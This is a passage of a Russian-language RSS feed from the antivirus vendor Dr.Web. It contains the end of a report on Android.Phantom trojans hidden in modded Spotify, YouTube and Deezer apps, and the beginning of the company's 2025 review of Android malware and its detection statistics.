Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Spotify Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;И в специальных телеграм-каналах:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54 400 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15 057 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Моды Spotify, размещенные на сайтах и в указанных на скриншотах телеграм-каналах, содержат&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и библиотеку для организации связи по стандарту WebRTC под Android.&lt;/p&gt;&lt;p&gt;Кроме модов Spotify, злоумышленники вшивают трояны в моды других популярных приложений: YouTube, Deezer, Netflix и др. Они размещены на специальных сайтах с модами:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Сайт Moddroid содержит раздел «Выбор редакции». Из 20 приложений в нем только 4 были чистыми. Остальные 16 содержали трояны семейства &lt;strong&gt;Android.Phantom&lt;/strong&gt;. Приложения на этих двух сайтах загружаются с одного CDN-сервера &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. У этих сайтов есть свои телеграм-каналы, где пользователи скачивают зараженные троянам моды:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87 653 подписчика)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6 297 подписчиков)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Также для своих целей преступники используют сервера Discord. Самый большой из них — Spotify X, около 24 тысяч подписчиков.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Администраторы Discord-серверов не стесняются напрямую предлагать зараженные моды. Например, на скриншоте выше администратор от лица сервера предлагает скачать мод музыкального стриминга Deezer вместо Spotify, поскольку последний перестал работать.&lt;/p&gt;&lt;p&gt;По ссылке скачивается рабочий мод. Его код защищен коммерческим упаковщиком, внутри которого скрывается троян&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Это загрузчик удаленного кода, по команде с сервера &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; он загружает уже нам знакомые&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и троян-шпион &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. Последний отправляет информацию об устройстве злоумышленникам, в том числе номер телефона, геолокацию, список установленных приложений.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Этот скриншот с сервера показывает, на каких языках говорят пользователи, которые становятся объектами заражения. Для доступа к чатам на языках, отличных от английского, необходимо поставить реакцию с соответствующим флагом. Больше всего отметились пользователи, говорящие на испанском, французском, немецком, польском и итальянском языках (не считая английского, который является основным языком сервера). Также администраторы сервера не предусмотрели чатов для многих стран Азии.&lt;/p&gt;&lt;p&gt;Трояны могут нанести существенный вред владельцам зараженных устройств. Перечислим несколько возможных исходов:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;Невольное соучастие.&lt;/strong&gt; Смартфон пользователя может быть использован в качестве бота при DDoS-атаке, тем самым делая владельца невольным соучастником киберпреступления.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Незаконная активность.&lt;/strong&gt; Через устройство злоумышленники могут совершать незаконную онлайн-деятельность, к примеру, использовать смартфон в мошеннических схемах или рассылать спам-сообщения.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Повышенное потребление заряда и трафика.&lt;/strong&gt; Посторонняя деятельность разряжает аккумулятор и расходует интернет-трафик.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Утечка персональных данных.&lt;/strong&gt; &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; является шпионом и может передавать данные об устройстве и владельце.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Трояны этого семейства представляют угрозу для владельцев мобильных устройств на Android, не защищенных актуальным антивирусным ПО. Российские пользователи испытывают трудности с регистрацией в зарубежных приложениях или оплатой подписок. Ситуация подталкивает искать и использовать альтернативные, зачастую полулегальные, способы получения услуг этих компаний. Эта ситуация на руку вирусописателям, ведь пользователям приходится рисковать и доверять сомнительным вариантам. Особую группу риска составляют дети, которые не думают о правилах цифровой гигиены, желая всего лишь поиграть, послушать музыку или посмотреть видеоклипы.&lt;/p&gt;&lt;p&gt;Мы рекомендуем не скачивать моды на сомнительных сайтах и в каналах. Как правило, проверка источников модов или приложений требует времени, опыта и насмотренности. Поэтому лучший вариант обеспечить себе и своим близким гарантированное спокойствие — использовать Dr.Web Security Space для мобильных устройств. Он защитит не только ваши смартфоны, но и другие умные устройства: игровые консоли, планшеты, smartTV.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Индикаторы компрометации&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.2.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.3&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.4.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Android.Phantom.5.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15104&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности для мобильных устройств за 2025 год</title><link>https://news.drweb.ru/show/?i=15104&amp;lng=ru&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/mobile_virus_review_2025_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;15 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Главное&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;В 2025 году пользователи Android-устройств чаще всего сталкивались с рекламными троянами, а также с программами-подделками, которые используются в мошеннических целях.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Самым распространенным нежелательным ПО, как и годом ранее, стали приложения, в игровой форме предлагающие выполнять те или иные задания и получать за это виртуальные награды. Они обещают возможность конвертировать вознаграждение в настоящие деньги, но на самом деле такой возможности в программах не предусмотрено.&lt;/p&gt;

&lt;p&gt;Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений, которые были модифицированы при помощи утилиты NP Manager. Она обфусцирует и защищает код модифицируемых программ от анализа и обнаружения, а также позволяет обходить проверку цифровой подписи после их изменения. Наиболее часто детектируемыми рекламными программами стали неофициальные модификации мессенджера WhatsApp, которые автоматически открывают рекламные ссылки при работе с приложением.&lt;/p&gt;

&lt;p&gt;В минувшем году были зафиксированы новые случаи внедрения вредоносных программ в прошивку различных моделей Android-устройств. Об одном из них мы рассказали весной 2025 года. Киберпреступникам удалось предустановить троян &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; на несколько бюджетных моделей смартфонов и с его помощью похищать криптовалюту жертв.&lt;/p&gt;

&lt;p&gt;Также весной наши специалисты обнаружили троянскую программу &lt;a href="https://vms.drweb.ru/search/?q=Android.Spy.1292.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, которую вирусописатели встроили в одну из модифицированных версий картографического ПО Alpine Quest. Вредоносное приложение было нацелено на российских военнослужащих и применялось в целях кибершпионажа.&lt;/p&gt;

&lt;p&gt;В конце лета антивирусная лаборатория «Доктор Веб» проинформировала о бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, который распространялся через популярные мессенджеры. Злоумышленники использовали его для слежки за сотрудниками российских компаний и сбора их конфиденциальной информации.&lt;/p&gt;

&lt;p&gt;А уже осенью мы рассказали об опасном бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которого киберпреступники встроили в модификации мессенджера Telegram X. Эта вредоносная программа позволяла взламывать учетные записи Telegram жертв и управлять самим мессенджером от имени пользователей.&lt;/p&gt;

&lt;p&gt;За минувшие 12 месяцев антивирусная лаборатория «Доктор Веб» выявила в каталоге Google Play более 180 угроз, которые в общей сложности были загружены свыше 2 165 000 раз. Среди них были различные варианты троянов, подписывающих пользователей на платные услуги, программы-подделки, которые применяются в мошеннических целях, а также новое рекламное и нежелательное ПО.&lt;/p&gt;

&lt;p&gt;В 2025 году вирусописатели продолжили использовать различные техники, направленные на усложнение анализа вредоносных Android-программ и обхода их детектирования антивирусами. Одним из популярных методов было конвертирование DEX-кода в C-код. Кроме того, наши вирусные аналитики отметили, что при создании вредоносного ПО злоумышленники применяют ИИ-ассистентов, которые помогают писать код.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Тенденции прошедшего года&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Рекламные трояны вновь стали наиболее распространенными Android-угрозами&lt;/li&gt;
        &lt;li&gt;Выросла популярность утилиты NP Manager, которая обфусцирует код модифицируемых Android-приложений и позволяет обходить проверку их цифровой подписи после модификации&lt;/li&gt;
        &lt;li&gt;Возросла активность банковских троянов&lt;/li&gt;
        &lt;li&gt;Выявлены новые случаи заражения прошивок Android-устройств&lt;/li&gt;
        &lt;li&gt;Киберпреступники продолжили использовать как уже известные техники для защиты вредоносных программ от детектирования и анализа, так и новые приемы&lt;/li&gt;
        &lt;li&gt;Вирусописатели активно применяли ИИ-помощников для написания кода вредоносных приложений&lt;/li&gt;
        &lt;li&gt;Появление новых угроз в каталоге Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Наиболее интересные события 2025 года&lt;/h3&gt;

&lt;p&gt;В апреле минувшего года эксперты «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15002&amp;lng=ru" target="_blank"&gt;выявили&lt;/a&gt; масштабную кампанию по краже криптовалют у владельцев Android-устройств. Злоумышленники получили доступ к цепочке поставок ряда китайских производителей и внедрили в прошивку нескольких бюджетных моделей смартфонов троянскую программу &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;. Вирусописатели встроили ее в модифицированную версию мессенджера WhatsApp. Для модификации использовался инструмент &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt;, позволяющий менять логику работы приложений без изменения их кода.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат атакующим. При этом троян скрывает подмену, и в таких сообщениях жертвам демонстрируются корректные кошельки. &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; также отправляет злоумышленникам все изображения в формате &lt;em&gt;jpg&lt;/em&gt;, &lt;em&gt;png&lt;/em&gt; и &lt;em&gt;jpeg&lt;/em&gt; для поиска в них сохраненных мнемонических фраз, позволяющих получить доступ к криптокошелькам. Киберпреступники встроили &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; и в десятки других программ, среди которых были популярные приложения криптокошельков, сканеры QR-кодов и прочие мессенджеры, в том числе — Telegram. Эти модификации распространялись через вредоносные сайты.&lt;/p&gt;

&lt;p&gt;В 2025 году отмечались и другие случаи проникновения вредоносных программ в системную область Android-устройств. Например, еще одной группе злоумышленников удалось внедрить новые версии опасных троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; в прошивку ряда бюджетных смартфонов. Вредоносные программы Triada опасны тем, что способны заражать системный процесс Zygote. Тот непосредственно участвует в запуске всех приложений в системе, поэтому и трояны Triada в дальнейшем могут внедряться в любое приложение на устройстве, фактически получая над ним полный контроль. Злоумышленники используют этих троянов для загрузки и установки других вредоносных программ, а также нежелательных и рекламных приложений. Кроме того, с их помощью они могут шпионить за жертвами, подписывать их на платные услуги и т. д. Также были выявлены новые случаи заражения прошивок TV-приставок на базе Android новыми версиями трояна &lt;a href="https://vms.drweb.ru/search/?q=Android.Vo1d&amp;lng=ru"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, которого наша компания &lt;a href="https://news.drweb.ru/show/?i=14900&amp;lng=ru" target="_blank"&gt;обнаружила&lt;/a&gt; в 2024 году. Vo1d представляет собой бэкдор, который помещает свои компоненты в системную область зараженных устройств и по команде атакующих способен скрытно скачивать и устанавливать стороннее ПО.&lt;/p&gt;

&lt;p&gt;Также в апреле наша антивирусная лаборатория &lt;a href="https://news.drweb.ru/show/?i=15006&amp;lng=ru" target="_blank"&gt;зафиксировала&lt;/a&gt; кампанию по распространению трояна-шпиона &lt;a href="https://vms.drweb.ru/search/?q=Android.Spy.1292.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, нацеленного на российских военнослужащих. Злоумышленники встроили вредоносную программу в одну из версий картографического ПО Alpine Quest и распространяли модификацию через созданный ими Telegram-канал, который выдавали за официальный, а также через один из российских каталогов Android-приложений.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Telegram-канал, через который злоумышленники распространяли вредоносную модификацию Alpine Quest, содержащую &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Spy.1292.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; передавал киберпреступникам данные об учетных записях и номере мобильного телефона, контакты из телефонной книги, геолокацию устройства и сведения о хранящихся на нем файлах. Троян мог похищать определенные файлы по команде атакующих. Тех интересовали конфиденциальные документы, которые пользователи отправляли через популярные мессенджеры, а также файл журнала локаций приложения Alpine Quest.&lt;/p&gt;

&lt;p&gt;В августе мы &lt;a href="https://news.drweb.ru/show/?i=15047&amp;lng=ru" target="_blank"&gt;рассказали&lt;/a&gt; о случаях распространения бэкдора &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; через личные сообщения в популярных мессенджерах. Атакующие предлагали потенциальным жертвам установить «антивирус» из прикрепленного к сообщениям APK-файла, в котором на самом деле и скрывалась вредоносная программа. Наша антивирусная лаборатория обнаружила первые версии &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; в январе 2025 года и с момента обнаружения отслеживала его активность, что и позволило оперативно выявить данную кампанию.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; вводит пользователей в заблуждение, имитируя работу антивируса&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После установки на Android-устройство &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; позволяет похищать конфиденциальную информацию и следить за пользователем. Например, с помощью бэкдора злоумышленники могут прослушивать разговоры, передавать трансляцию с камеры, отслеживать местоположение и красть содержимое из мессенджеров и браузеров. Кроме того, &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; реализует функциональность кейлоггера для перехвата вводимого текста, в том числе — паролей. По оценкам наших специалистов, бэкдор применяется в таргетированных атаках и не предназначен для массового распространения. Основной целью для киберпреступников являются сотрудники российских компаний.&lt;/p&gt;

&lt;p&gt;В октябре «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15076&amp;lng=ru" target="_blank"&gt;опубликовал&lt;/a&gt; сведения о многофункциональном бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, который наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Основным источником его распространения стали вредоносные сайты, куда потенциальные жертвы попадают через рекламу в мобильных приложениях. На этих сайтах пользователям предлагается установить Telegram X — якобы для поиска партнера для общения и свиданий. При этом такие интернет-ресурсы в большей степени ориентированы на жителей Индонезии и Бразилии. В то же время мы выявили этот бэкдор и в ряде сторонних каталогов Android-приложений.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример вредоносного сайта, с которого загружалась троянская версия Telegram X&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Одной из задач &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; является кража конфиденциальных данных. Например, вредоносная программа похищает логин и пароль от учетной записи Telegram жертвы, историю переписки в мессенджере, входящие СМС, контакты из телефонной книги устройства, а также способна перехватывать содержимое буфера обмена. Однако злоумышленники используют ее не только в качестве шпионского приложения. С помощью &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; они фактически могут управлять взломанной учетной записью и контролировать работу Telegram X, изменяя его функциональность. Так, бэкдор позволяет незаметно добавлять пользователя и удалять его из Telegram-каналов, вступать от его лица в чаты и скрывать устройства, авторизованные для его учетной записи. Для выполнения действий, которые требуют вмешательства в логику работы приложения, используется фреймворк Xposed. Киберпреступники управляют бэкдором как традиционным способом — через C2-сервер, так и путем отправки команд через базу данных Redis, что ранее не встречалось в других вредоносных программах для ОС Android. Общее число устройств, зараженных &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, превысило 58 000. При этом были затронуты около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_ru_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_ru_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Страны с наибольшим числом устройств, зараженных &lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Статистика&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в 2025 году самыми распространенными Android-угрозами стали различные вредоносные программы — пользователи сталкивались с ними в 81,11% случаев. Следом с долей 10,73% расположились потенциально опасные приложения. Третье место заняли рекламные программы, которые обнаруживались в 5,89% случаев. Наименьшая активность наблюдалась со стороны нежелательного ПО: на него пришлось 2,27% детектирований.&lt;/p&gt;

&lt;p&gt;По сравнению с годом ранее, доля вредоносных и потенциально опасных программ возросла, в то время как доля нежелательного и рекламного ПО снизилась.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;Вредоносные приложения&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;На протяжении нескольких лет рекламные трояны семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; остаются лидерами по числу детектирований вредоносного ПО. В 2025 году ситуация не изменилась, однако за прошедшие 12 месяцев их доля несколько сократилась — с 31,95% до 27,42%.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Эти трояны показывают навязчивую рекламу в виде полноэкранных баннеров и видеороликов. Чтобы пользователям было сложнее обнаружить и удалить вредоносные программы с зараженных устройств, после установки они пытаются «спрятаться», например, скрывая или подменяя свои значки в меню главного экрана.&lt;/p&gt;

